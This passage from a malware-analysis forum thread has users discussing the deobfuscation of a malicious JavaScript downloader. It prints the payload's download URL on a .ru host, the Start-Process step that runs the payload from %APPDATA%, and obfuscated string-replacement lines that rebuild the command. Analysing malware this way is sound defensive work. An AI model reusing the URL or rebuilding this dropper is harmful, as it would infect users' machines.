- parameter2 : the path + name to be used for the payload
- Start-Process %APPDATA%\eXe : runs the payload

URL :


http ://love.newsexgirls.ru/js/boxun4.bin
END :)

----------------------------------------------------------------------------------------------------------------------
Want to see an elaborate script?! Don't forget this one (see both parts):
https://malwaretips.com/threads/deo...-oct-17-elaborate-methods-used-updated.64575/
Great share @DardiM :) Thank you for choosing that sample and for your time :)
 

DardiM

Great work my friend :) but I have a question. What does "easy" mean for you? :eek:

Thanks for sharing it with us my friend! :)
Thanks :)

What does "easy" mean for you?

Good question, lol :)

I call it easy when the important part can be found in less than 10 s and deobfuscated in less than 30 s, all with only Notepad++.
(The hardest thing was to make the post :oops:)

The only useful part of the script is described in 2-1) => compared with the full content, most of it isn't used (it is only there for the "eyes", lol).

=> Everything has been put into a single string, with some patterns added.
=> only two lines are needed to get the real string (with everything used to download and run the payload):

- var jaqinod = "ejewcamd.exozettxexozett /ejewca ......"
- var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);

As an example, see part 1 and part 2 in the link below => "less easy" (or "harder") to deobfuscate / analyze, and dynamic tests are needed:
https://malwaretips.com/threads/deo...-oct-17-elaborate-methods-used-updated.64575/

The funny thing is that both scripts did their job :confused:
 
